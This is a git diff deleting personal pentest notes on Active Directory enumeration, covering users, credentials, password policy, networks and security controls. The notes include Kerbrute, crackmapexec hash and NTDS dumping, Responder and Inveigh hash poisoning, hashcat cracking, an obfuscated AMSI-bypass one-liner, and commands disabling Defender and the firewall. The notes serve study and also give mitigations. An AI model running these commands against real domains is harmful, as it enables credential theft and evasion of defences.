diff --git a/.trash/active-directory-enumeration.md b/.trash/active-directory-enumeration.md deleted file mode 100644 index bb82df7eb..000000000 --- a/.trash/active-directory-enumeration.md +++ /dev/null 
@@ -1,1264 +0,0 @@ ---- -title: Active Directory - Enumeration -author: amandaguglieri -draft: false -TableOfContents: true -tags: - - active - - directory - - ldap - - windows ---- - - -# Enumerating Active Directory - -**Tool for enumeration**: - -- [Enumeration with LDAP queries](389-636-ldap.md) -- [PowerView.ps1 from PowerSploit project (powershell)](powerview.md). -- [The ActiveDirectory PowerShell module (powershell)](activedirectory-powershell-module.md). -- [BloodHound (C# and PowerShell Collectors)](bloodhound.md). -- [SharpView (C#)](sharpview.md). -- [kerbrute](kerbrute.md). -- [Crackmapexec](crackmapexec.md). -- [enum4linux](enum4linux.md). -- net.exe. -- [powershell](powershell.md). -- [ActiveDirectory PowerShell Module](activedirectory-powershell-module.md). - - -## 1. Users - -### From Windows - -#### Kerbrute - -[See kerbrute](kerbrute.md). - - It takes advantage of the fact that Kerberos pre-authentication failures often will not trigger logs or alerts. - - -``` -sudo git clone https://github.com/ropnop/kerbrute.git - -# Typing make help will show us the compiling options available. -cd kerbrute -make help - -# type make all and compile one each for use on Linux, Windows, and Mac systems (an x86 and x64 version for each). -sudo make all - -# The newly created dist directory will contain our compiled binaries. 
-ls -la dist - -# Copy the file to the windows pivoting machine -scp kerbrute_windows_amd64.exe username@$ip:~/ -``` - -``` -kerbrute_windows_amd64.exe userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users -# d: domain -# --dc: domain controller -# -o: output file -``` - -#### powershell - -[See powershell](powershell.md) - -```powershell -# Prints all the information about the system -systeminfo - -# Prints the PC's Name -hostname - -# Am I alone -qwinsta - -# Display Powershell relevant Powershell version information -echo $PSVersion -echo $PSVersionTable - -# Prints out the OS version and revision level -[System.Environment]::OSVersion.Version - -# Prints the patches and hotfixes applied to the host -wmic qfe get Caption,Description,HotFixID,InstalledOn - -# Displays a list of environment variables for the current session (ran from CMD-prompt) -set - -# Return environment values such as key paths, users, computer information, etc. -Get-ChildItem Env: | ft Key,Value - -# Displays the domain name to which the host belongs (ran from CMD-prompt) -echo %USERDOMAIN% - -# Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt) -echo %logonserver% - -#You can tell if PowerShell is running with administrator privileges (a.k.a “elevated” rights) with the following snippet: -[Security.Principal.WindowsIdentity]::GetCurrent().Groups -contains 'S-1-5-32-544' - -# Retrieves the WindowsIdentity for the currently running user. -[Security.Principal.WindowsIdentity]::GetCurrent() - -# Access the groups property of the identity to find out what user groups the identity is a member of. -[Security.Principal.WindowsIdentity]::GetCurrent()(...).groups - -# It returns true if groups contains the Well Known SID of the Administrators group (the identity will only contain it if “run as administrator” was used) and otherwise false. 
-[Security.Principal.WindowsIdentity]::GetCurrent() -contains "S-1-5-32-544" - -# List disabled users with LDAP -Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=2)' | select name - -``` - -Net commands in powershell: - -```powershell -# Information about domain groups -net group /domain - -# List users with domain admin privileges -net group "Domain Admins" /domain - -# List of PCs connected to the domain -net group "domain computers" /domain - -# List PC accounts of domains controllers -net group "Domain Controllers" /domain - -# User that belongs to the group -net group /domain - -# List of domain groups -net groups /domain - -# All available groups -net localgroup - -# List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default) -net localgroup administrators /domain - -# Information about a group (admins) -net localgroup Administrators - -# Add user to administrators -net localgroup administrators [username] /add - - -# Get information about a user within the domain -net user /domain - -# List all users of the domain -net user /domain - -# Information about the current user -net user %username% - -``` - - -#### Windows Management Instrumentation (WMI) - -```powershell -#Displays information about all local accounts and any domain accounts that have logged into the device -wmic useraccount list /format:list - -# Information about all local groups -wmic group list /format:list - -# Dumps information about any system accounts that are being used as service accounts. -wmic sysaccount list /format:list -``` - - -#### ActiveDirectory PowerShell module - -[See more at ActiveDirectory PowerShell module.](activedirectory-powershell-module.md) - -**Get-ADDomain**: We'll enumerate some basic information about the domain with the Get-ADDomain cmdlet. - -```powershell -# This will print out helpful information like the domain SID, domain functional level, any child domains, and more. 
-Get-ADDomain -``` - -**Get-ADUser**: [More on https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-aduser?view=windowsserver2022-ps](https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-aduser?view=windowsserver2022-ps). - -```powershell -# This command gets all users in the container OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM. -Get-ADUser -Filter * -SearchBase "OU=Finance,OU=UserAccounts,DC=FABRIKAM,DC=COM" - -# This command gets all users that have a name that ends with SvcAccount: -Get-ADUser -Filter 'Name -like "*SvcAccount"' | Format-Table Name,SamAccountName -A - -# This command gets all of the properties of the user with the SAM account name ChewDavid: -Get-ADUser -Identity ChewDavid -Properties * - -# This command gets the user with the name ChewDavid in the Active Directory Lightweight Directory Services (AD LDS) instance: -Get-ADUser -Filter "Name -eq 'ChewDavid'" -SearchBase "DC=AppNC" -Properties "mail" -Server lds.Fabrikam.com:50000 - -# This command gets all enabled user accounts in Active Directory using an LDAP filter: meaning to return all disabled accounts -Get-ADUser -LDAPFilter '(!userAccountControl:1.2.840.113556.1.4.803:=2)' - -# search for all administrative users with the `DoesNotRequirePreAuth` attribute set, meaning that they can be ASREPRoasted: -Get-ADUser -Filter {adminCount -eq '1' -and DoesNotRequirePreAuth -eq 'True'} - - - -# Find all administrative users with the SPN "servicePrincipalName" attribute set, meaning that they can likely be subject to a Kerberoasting attack -Get-ADUser -Filter "adminCount -eq '1'" -Properties * | where servicePrincipalName -ne $null | select SamAccountName,MemberOf,ServicePrincipalName | fl - -# Another way to retrieve Service Principals -Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName - -``` - -**Get-ADComputer**: - -```powershell -# Search domain computers for interesting hostnames. 
SQL servers are a particularly juicy target on internal assessments. The below command searches all hosts in the domain using `Get-ADComputer`, filtering on the `DNSHostName` property that contains the word `SQL` -Get-ADComputer -Filter "DNSHostName -like 'SQL*'" -``` - -**Get-ADGroup**: - -```powershell -# Group enumeration -Get-ADGroup -Filter * | select name - -# Get detailed information about a group -Get-ADGroup -Identity "Backup Operators" - -# Search for administrative groups by filtering on the `adminCount` attribute. If set to `1`, it's protected by AdminSDHolder and known as protected groups. `AdminSDHolder` is owned by the Domain Admins group. It has the privileges to change the permissions of objects in Active Directory. -Get-ADGroup -Filter "adminCount -eq 1" | select Name -``` - -**Get-ADGroupMember**: - -```powershell -# Returns members of a group -Get-ADGroupMember -Identity "Backup Operators" -``` - -**Get-ADTrust**: Verify domain trust relationships using the [Get-ADTrust](https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adtrust?view=windowsserver2022-ps) cmdlet. This cmdlet will print out any trust relationships the domain has. We can determine if they are trusts within our forest or with domains in other forests, the type of trust, the direction of the trust, and the name of the domain the relationship is with. This will be useful on when looking to take advantage of child-to-parent trust relationships and attacking across forest trusts. - -```powershell -Get-ADTrust -Filter * -``` - -#### PowerView -[See more at Powerview](powerview.md). 
- - -**Module: ActiveDirectory** - -```powershell -######################## -# Domain/LDAP Functions -######################## - -# Returns the AD object for the current (or specified) domain -Get-Domain - -# Return a list of the Domain Controllers for the specified domain -Get-DomainController - -# Returns all users or specific user objects in AD -Get-DomainUser -# Example: -# Get-DomainUser -Identity $username -Domain $domain | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol - -# Checks for users with the SPN attribute set -Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName - -# Returns all computers or specific computer objects in AD -Get-DomainComputer - -# Returns all groups or specific group objects in AD -Get-DomainGroup - -# Searches for all or specific OU objects in AD -Get-DomainOU - -# Finds object ACLs in the domain with modification rights set to non-built in objects -Find-InterestingDomainAcl - -# Returns the members of a specific domain group -Get-DomainGroupMember -# Example: -# Get-DomainGroupMember -Identity "Domain Admins" -Recurse -# Adding the -Recurse switch tells PowerView that if it finds any groups that are part of the target group (nested group membership) - -# Returns a list of servers likely functioning as file servers -Get-DomainFileServer - -# Returns a list of all distributed file systems for the current (or specified) domain -Get-DomainDFSShare - - -######################## -# GPO Functions -######################## -# Returns all GPOs or specific GPO objects in AD -Get-DomainGPO - -# Returns the default domain policy or the domain controller policy for the current domain -Get-DomainPolicy - - -######################## -# Computer Enumeration Functions -######################## -# Enumerates local groups on the local or a remote machine -Get-NetLocalGroup - -# Enumerates 
members of a specific local group -Get-NetLocalGroupMember - -# Returns open shares on the local (or a remote) machine -Get-NetShare - -# Returns session information for the local (or a remote) machine -Get-NetSession - -# Tests if the current user has administrative access to the local (or a remote) machine -Test-AdminAccess -# Example: -# Test-AdminAccess -ComputerName ACADEMY-EA-MS01 - - -######################## -# Threaded 'Meta'-Functions: -######################## -# Finds machines where specific users are logged in -Find-DomainUserLocation - -# Finds reachable shares on domain machines -Find-DomainShare - -# Searches for files matching specific criteria on readable shares in the domain -Find-InterestingDomainShareFile - -# Finds machines on the local domain where the current user has local administrator access -Find-LocalAdminAccess - - -######################## -# Domain Trust Functions: -######################## -# Returns domain trusts for the current domain or a specified domain -Get-DomainTrust - -# Returns all forest trusts for the current forest or a specified forest -Get-ForestTrust - -# Enumerates users who are in groups outside of the user's domain -Get-DomainForeignUser - -# Enumerates groups with users outside of the group's domain and returns each foreign member -Get-DomainForeignGroupMember - -# Enumerates all trusts for the current domain and any others seen. -Get-DomainTrustMapping -``` - - -```powershell -# Gets the ID for the current Domain (useful later for crafting Golden tickets) -Get-DomainID - -# Displays policies for the Domain and accounts, including for instance LockoutBadAccounts -Get-DomainPolicy - -# Requests the Kerberos ticket for a specified Service Principal Name (SPN) account -Get-DomainSPNTicket -``` - - -#### SharpView - -[More about SharpView](sharpview.md). - - -Download github repo from: [https://github.com/tevora-threat/SharpView/](https://github.com/tevora-threat/SharpView/). 
- - -```powershell -# Obtain help about a command -\SharpView.exe Get-DomainUser -Help - -# Get information about a given user -.\SharpView.exe Get-DomainUser -Identity $username -``` - -### From Linux - - -#### Kerbrute - -[See kerbrute](kerbrute.md). - - It takes advantage of the fact that Kerberos pre-authentication failures often will not trigger logs or alerts. - This method does not generate Windows event ID [4625: An account failed to log on](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625), or a logon failure which is often monitored for. - -**How it works?** - -Basically, the tool sends TGT requests to the domain controller without Kerberos Pre-Authentication to perform username enumeration. If the KDC responds with the error `PRINCIPAL UNKNOWN`, the username is invalid. Whenever the KDC prompts for Kerberos Pre-Authentication, this signals that the username exists, and the tool will mark it as valid. - -*This method of username enumeration does not cause logon failures and will not lock out accounts.* - - -``` -sudo git clone https://github.com/ropnop/kerbrute.git - -# Typing make help will show us the compiling options available. -cd kerbrute -make help - -# type make all and compile one each for use on Linux, Windows, and Mac systems (an x86 and x64 version for each). -sudo make all - -# The newly created dist directory will contain our compiled binaries. -ls -la dist - -# Add the tool to our PATH to make it accessible from anywhere in the host. 
For that we make sure first of the PATH -echo $PATH - -# and then we move the binary to a path, for instance -sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute -``` - -``` -kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users -# d: domain -# --dc: domain controller -# -o: output file -``` - -**However**, using Kerbrute for username enumeration will generate event ID [4768: A Kerberos authentication ticket (TGT) was requested](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768). Defenders can tune their SIEM tools to look for an influx of this event ID. - -#### crackmapexec - -[CrackMapExec](crackmapexec.md): - -```shell-session -# This is a useful tool that will also show the badpwdcount -crackmapexec smb $ip --users - -# Also, if we have valid credentials, we could extract the users with the flag --users -sudo crackmapexec smb $ip -u $username -p $password --users -``` - -As a matter of fact, if we have a foothold on the domain, we could perform the following enumeration: - -```powershell -# Check if we can access a machine -crackmapexec smb $ip --local-auth -u -p -d - -# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH) -crackmapexec smb $ip -u -H -d - -# Enumerate active sessions -crackmapexec smb $ip --local-auth -u -p -d --sessions - - -# Get sam: extract hashes from all users authenticated in the machine -crackmapexec smb $ip -u -p -d --sam - -# Get the ntds.dit, given that your user has permissions -crackmapexec smb $ip -u -p -d --ntds - -# Check which machines we can access in a subnet -crackmapexec smb $ip/24 -u -p -d - -# Enumerate logged on users in other hosts of the domain -crackmapexec smb $ip --local-auth -u -p -d --loggedon-users - -# Enumerate users of the domain -sudo crackmapexec smb $ip -u -p -d --users - -crackmapexec smb $ip --local-auth -u -p -d --users - -# Enumerate groups of the domain -crackmapexec smb $ip --local-auth -u -p -d 
--groups - -``` - -#### rpcclient - -[rpcclient](rpcclient.md) and the  SMB NULL session technique: - -```shell-session -# Connect to a remote shared folder (same as smbclient in this regard) -rpcclient -U "" -N $ip - -# Enumerate all domains that are deployed in the network -enumdomains - -# Provides domain, server, and user information of deployed domains. -querydominfo - -# Enumerates all domain users. -enumdomusers -``` - - -#### enum4linux - -[enum4linux](enum4linux.md) - -``` -# Enumerate users -enum4linux -U $ip | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" - -``` - - -#### ldap - -LDAP anonymous binds allow unauthenticated attackers to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. - -##### ldapsearch - -```shell-session -ldapsearch -h $ip -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" " - -``` - -Other tools related to ldap: `windapsearch.py`, `ldapsearch`, `ad-ldapdomaindump.py`. - -##### windapsearch - -[See more at windapsearch.](windapsearch.md) - - -```shell-session -# Enumerate Users -./windapsearch.py -d $domain -u $username\\ldapbind -p $password -U -# -U: returns only USERS -# -u: specifies username. "" for blank -# -p: indicates password -# -d: indicates domain - -# Enumerate users with no user foothold -./windapsearch.py --dc-ip $ip -u "" -U -# -u: specifies username. "" for blank -# -U: returns only USERS - -# Enumerate Domain Admins -./windapsearch.py --dc-ip $ip -u $username@$domain -p $password --da -./windapsearch.py -d $domain -u $username\\ldapbind -p $password --da -# --da: returns only Domain admins -# -u: specifies username. 
"" for blank -# -p: indicates password -# -d: indicates domain -# Example: -# python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da - -# Enumerating Computers -./windapsearch.py -d $domain -u $username\\ldapbind -p $password -C -r -# -r or --resolve option: the tool will perform a DNS lookup on every enumerated dNSHostName found and output the computer information, including IP address in CSV format. -# -C: list all matching entries where objectClass=Computer - -# Custom Search -./windapsearch.py -d $domain -u $username\\ldapbind -p $password -s Lalala -# -s: search everywhere the term, in this case Lalala. - -# Enumerate Privilege Users with -PU -python3 windapsearch.py --dc-ip $ip -u $username@$domain -p $password -PU -``` - - -## 2. Credentials - -### From Windows - -#### LLMNR/NBT-NS Poisoning with Inveigh - -[See Inveigh](inveigh.md). - -LLMNR & NBT-NS poisoning is possible from a Windows host as well.  Inveigh can listen to IPv4 and IPv6 and several other protocols, including `LLMNR`, DNS, `mDNS`, NBNS, `DHCPv6`, ICMPv6, `HTTP`, HTTPS, `SMB`, LDAP, `WebDAV`, and Proxy Auth. - -**Powershell version**: The PowerShell version of Inveigh is the original version and is no longer updated. The tool author maintains the C# version (in the belowed section). - -``` -# Install the module -Import-Module .\Inveigh.ps1 - -# List parameters -(Get-Command Invoke-Inveigh).Parameters - - -# Start Inveigh with LLMNR and NBNS spoofing, and output to the console and write to a file. -Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y -``` - - -**C# version**: Before we can use the C# version of the tool, we have to compile the executable. 
After that we can run: - -```powershell -.\Inveigh.exe -``` - - -Results: - -```powershell -[*] Inveigh 2.0.4 [Started 2022-02-28T20:03:28 | PID 6276] -[+] Packet Sniffer Addresses [IP 172.16.5.25 | IPv6 fe80::dcec:2831:712b:c9a3%8] -[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::] -[+] Spoofer Reply Addresses [IP 172.16.5.25 | IPv6 fe80::dcec:2831:712b:c9a3%8] -[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled] -[ ] DHCPv6 -[+] DNS Packet Sniffer [Type A] -[ ] ICMPv6 -[+] LLMNR Packet Sniffer [Type A] -[ ] MDNS -[ ] NBNS -[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80] -[ ] HTTPS -[+] WebDAV [WebDAVAuth NTLM] -[ ] Proxy -[+] LDAP Listener [Port 389] -[+] SMB Packet Sniffer [Port 445] -[+] File Output [C:\Tools] -[+] Previous Session Files (Not Found) -[*] Press ESC to enter/exit interactive console -[!] Failed to start HTTP listener on port 80, check IP and port usage. -[!] Failed to start HTTPv6 listener on port 80, check IP and port usage. -[ ] [20:03:31] mDNS(QM)(A) request [academy-ea-web0.local] from 172.16.5.125 [disabled] -[ ] [20:03:31] mDNS(QM)(AAAA) request [academy-ea-web0.local] from 172.16.5.125 [disabled] -[ ] [20:03:31] mDNS(QM)(A) request [academy-ea-web0.local] from fe80::f098:4f63:8384:d1d0%8 [disabled] -[ ] [20:03:31] mDNS(QM)(AAAA) request [academy-ea-web0.local] from fe80::f098:4f63:8384:d1d0%8 [disabled] -[+] [20:03:31] LLMNR(A) request [academy-ea-web0] from 172.16.5.125 [response sent] -[-] [20:03:31] LLMNR(AAAA) request [academy-ea-web0] from 172.16.5.125 [type ignored] -[+] [20:03:31] LLMNR(A) request [academy-ea-web0] from fe80::f098:4f63:8384:d1d0%8 [response sent] - -``` - - -- `[+]`  default option and enabled by default -- `[ ]`  disabled options - -**Console access:** Press ESC to enter/exit interactive console. The console gives us access to captured credentials/hashes, allows us to stop Inveigh, and more. 
- -```powershell-session -# List commands -> HELP - -# view unique captured hashes ->  GET NTLMV2UNIQUE - -# see which usernames we have collected. -GET NTLMV2USERNAMES -``` - - -Mitigations: To ensure that these spoofing attacks are not possible, we can disable LLMNR and NBT-NS. - -- We can disable LLMNR in Group Policy by going to Computer Configuration --> Administrative Templates --> Network --> DNS Client and enabling "Turn OFF Multicast Name Resolution." -- NBT-NS cannot be disabled via Group Policy but must be disabled locally on each host. We can do this by opening `Network and Sharing Center` under `Control Panel`, clicking on `Change adapter settings`, right-clicking on the adapter to view its properties, selecting `Internet Protocol Version 4 (TCP/IPv4)`, and clicking the `Properties` button, then clicking on `Advanced` and selecting the `WINS` tab and finally selecting `Disable NetBIOS over TCP/IP`. -- NBT-NS can also be disabled - - - by creating a PowerShell script under Computer Configuration --> Windows Settings --> Script (Startup/Shutdown) --> Startup with something like the following: - -```powershell -regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" -Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose} -``` - - - Double click on Startup, choose the PowerShell Scripts tab, and select "For this GPO, run scripts in the following order" to Run Windows PowerShell scripts first, and then click on Add and choose the script. - - Reboot the target system or restart the network adapter. 
- - ->To push this out to all hosts in a domain, we could create a GPO using `Group Policy Management` on the Domain Controller and host the script on the SYSVOL share in the scripts folder and then call it via its UNC path such as: `\\inlanefreight.local\SYSVOL\INLANEFREIGHT.LOCAL\scripts` -> ->Once the GPO is applied to specific OUs and those hosts are restarted, the script will run at the next reboot and disable NBT-NS, provided that the script still exists on the SYSVOL share and is accessible by the host over the network. - - -Some detection methods: [https://www.praetorian.com/blog/a-simple-and-effective-way-to-detect-broadcast-name-resolution-poisoning-bnrp/](https://www.praetorian.com/blog/a-simple-and-effective-way-to-detect-broadcast-name-resolution-poisoning-bnrp/) - - -### From Linux - -#### LLMNR/NBT-NS Poisoning - -[Link-Local Multicast Name Resolution](https://datatracker.ietf.org/doc/html/rfc4795) (LLMNR) and [NetBIOS Name Service](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc940063(v=technet.10)?redirectedfrom=MSDN) (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification that can be used when DNS fails. - -If a machine attempts to resolve a host but DNS resolution fails, typically, the machine will try to ask all other machines on the local network for the correct host address via LLMNR. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. - -It uses port `5355` over UDP natively. If LLMNR fails, the NBT-NS will be used. NBT-NS identifies systems on a local network by their NetBIOS name. NBT-NS utilizes port `137` over UDP. - -The kicker here is that when LLMNR/NBT-NS are used for name resolution, ANY host on the network can reply. This is where we come in with `Responder` to poison these requests. 
- -Several tools can be used to attempt LLMNR & NBT-NS poisoning: - -|**Tool**|**Description**| -|---|---| -|[Responder](https://github.com/lgandx/Responder)|Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.| -|[Inveigh](https://github.com/Kevin-Robertson/Inveigh)|Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.| -|[Metasploit](https://www.metasploit.com/)|Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.| - -Listening with responder - -```bash -sudo responder -I ens224 -A -wf -# sudo privileges or root to make sure that all ports needed are available on our attack host for it to function best. -# -w: The use of the -w flag utilizes the built-in WPAD proxy server. This can be highly effective, especially in large organizations, because it will capture all HTTP requests by any users that launch Internet Explorer if the browser has Auto-detect settings enabled. -# -f: attempts to fingerprint the remote host operating system and version. -``` - -With this configuration shown above, Responder will listen and answer any requests it sees on the wire. - -All saved Hashes are located in Responder's logs directory (`/usr/share/responder/logs/`). - -**NetNTLMv2 hashes are very useful once cracked, but cannot be used for techniques such as pass-the-hash**, meaning we have to attempt to crack them offline with [hashcat](hashcat.md) or [johntheripper](john-the-ripper.md). For example, in the case of a NetNTLMv2 hash, we can copy the hash to a file and attempt to crack it using the hashcat module 5600. - -```shell-session -hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt -``` - -[See hashcat for other modules beside 5600](hashcat.md). 
- -> Hashes are also stored in a SQLite database that can be configured in the `Responder.conf` config file, typically located in `/usr/share/responder` unless we clone the Responder repo directly from GitHub. - - - -## 3. Password policy - -### From Windows - -Some tools work for this end: `net.exe`, PowerView, CrackMapExec ported to Windows, SharpMapExec, SharpView, etc. - -##### net.exe - -```cmd-session -net accounts -``` - -##### PowerView - -Blocked by Microsoft Defender. -PowerView gave us the same output as our net accounts command, just in a different format but also revealed that password complexity is enabled (PasswordComplexity=1). - -```powershell-session -import-module .\PowerView.ps1 - -Get-DomainPolicy -``` - -##### Windows Management Instrumentation (`WMI`) - -```powershell -# Dumps information about any system accounts that are being used as service accounts. -wmic sysaccount list /format:list -``` - -##### Powershell - -[The net.exe commands](powershell.md): - -```powershell -# Information about password requirements -net accounts - -# Password and lockout policy -net accounts /domain - -# Information about the current user -net user %username% -``` - -### From Linux - - -The password policy can also be obtained remotely with: - -#### crackmapexec - -[CrackMapExec](crackmapexec.md): - -```shell-session -# Obtain the password policy -crackmapexec smb $ip -u -p --pass-pol -``` - - -#### rpcclient - -[rpcclient](rpcclient.md) and the  SMB NULL session technique: - -```shell-session -rpcclient -U "" -N $ip - -rpcclient $> querydominfo -``` - - -#### enum4linux - -- [enum4linux](enum4linux.md) - -```shell-session -enum4linux -P $ip - -enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" -``` - -- [enum4linux-ng](enum4linux.md) - -```shell-session -enum4linux-ng.py -P -oA ilfreight - -# Enum4linux-ng provided us with a bit clearer output and handy JSON and YAML output using the -oA flag. 
-cat ilfreight.json -``` - -#### Net - -With net use: - -```cmd-session -# Establish a null session from windows -net use \\DC01\ipc$ "" /u:"" - -# use a username/password combination to attempt to connect -net use \\DC01\ipc$ "" /u:guest -System error 1331 has occurred. -# Error: Account is Disabled - -net use \\DC01\ipc$ "password" /u:guest -# System error 1326 has occurred. -# The user name or password is incorrect. - -net use \\DC01\ipc$ "password" /u:guest -# System error 1909 has occurred. -# The referenced account is currently locked out and may not be logged on to. -``` - - -#### ldap - -LDAP anonymous binds allow unauthenticated attackers to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. - -```shell-session -ldapsearch -h $ip -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength -``` - -Other tools related to ldap: `windapsearch.py`, `ldapsearch`, `ad-ldapdomaindump.py`. - - - -## 4. Networks - -### From Windows - -#### Powershell and net commands - -[See powershell](powershell.md). - -```powershell -# Lists all known hosts stored in the arp table. -arp -a - -# Prints out adapter settings for the host. We can figure out the network segment from here. -ipconfig /all - -# Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host. -route print - -# Displays the status of the host's firewall. We can determine if it is active and filtering traffic. -netsh advfirewall show allprofiles -``` - - -**Evasion trick**: If you believe the network defenders are actively logging/looking for any commands out of the normal, you can try this workaround to using net commands. Typing `net1` instead of `net` will execute the same functions without the potential trigger from the net string. 
[The net.exe commands](powershell.md): - -```powershell -# Information about password requirements -net accounts - -# Password and lockout policy -net accounts /domain - -# Information about domain groups -net group /domain - -# List users with domain admin privileges -net group "Domain Admins" /domain - -# List of PCs connected to the domain -net group "domain computers" /domain - -# List PC accounts of domains controllers -net group "Domain Controllers" /domain - -# User that belongs to the group -net group /domain - -# List of domain groups -net groups /domain - -# All available groups -net localgroup - -# List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default) -net localgroup administrators /domain - -# Information about a group (admins) -net localgroup Administrators - -# Add user to administrators -net localgroup administrators [username] /add - -# Check current shares -net share - -# Get information about a user within the domain -net user /domain - -# List all users of the domain -net user /domain - -# Information about the current user -net user %username% - -# Mount the share locally -net use x: \computer\share - -# Get a list of computers -net view - -# Shares on the domains -net view /all /domain[:domainname] - -# List shares of a computer -net view \computer /ALL - -# List of PCs of the domain -net view /domain -``` - - - - - -## 5. Security controls - -### From Windows - -**cmd** - -```cmd -# Check if Windows Defender is running (from CMD.exe). -sc query windefend -``` - -#### Powershell -[See powershell](powershell.md). - -**Policies and antivirus** - -```powershell -# Lists available modules loaded for use. -Get-Module - -# print the execution policy settings for each scope on a host. -Get-ExecutionPolicy -List - -#This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. 
This is ideal because we won't be making a permanent change to the victim host. -Set-ExecutionPolicy Bypass -Scope Process -``` - - [AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) is Microsoft's application whitelisting solution and gives system administrators control over which applications and files users can run. - -```powershell -# Enumerate AppLocker policies -Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections -# If we find that a file cannot be run from a location, maybe we can try to run it from another location. - -# Quickly enumerate whether we are in Full Language Mode or Constrained Language Mode. -$ExecutionContext.SessionState.LanguageMode - -# Check current execution policy. If the answer is -# - "Restricted": Ps scripts cannot run. -# - "RemoteSigned": Downloaded scripts will require the script to be signed by a trusted publisher. -Get-Execution-Policy - -# Bypass execution policy -powershell -ep bypass - -# Get the current Defender status. 
-Get-MpComputerStatus - -# Deactivate antivirus from powershell session (if user has rights to do so) -Set-MpPreference -DisableRealtimeMonitoring $true - -# Disable firewall -netsh advfirewall set allprofiles state off - -# Bypass AMSI -S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} ) - -# Add a registry -reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f -``` - -#### LAPSToolkit - -[LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) is a powershell functions that leverage PowerView to audit and attack Active Directory environments that have deployed Microsoft's Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins, finding users with "All Extended Rights" that can view passwords, and viewing all computers with LAPS enabled. - -An account that has joined a computer to a domain receives `All Extended Rights` over that host, and this right gives the account the ability to read passwords. Enumeration may show a user account that can read the LAPS password on a host. This can help us target specific AD users who can read LAPS passwords. 
- -```powershell -# Search for computers that have LAPS enabled when passwords expire -Get-LAPSComputers - -# Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute -Find-LAPSDelegatedGroups - -# Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute, meaning Users with "All Extended Rights" can read LAPS passwords and may be less protected than users in delegated groups -Find-AdmPwdExtendedRights -``` - -#### WMI - -See [Windows Management Instrumentation (`WMI`)](135-windows-management-instrumentation-wmi.md). - -```powershell -# Prints the patch level and description of the Hotfixes applied -wmic qfe get Caption,Description,HotFixID,InstalledOn - -# Displays basic host information to include any attributes within the list -wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List - -# A listing of all processes on host -wmic process list /format:list - -# Displays information about the Domain and Domain Controllers -wmic ntdomain list /format:list - -#Displays information about all local accounts and any domain accounts that have logged into the device -wmic useraccount list /format:list - -# Information about all local groups -wmic group list /format:list - -# Dumps information about any system accounts that are being used as service accounts. 
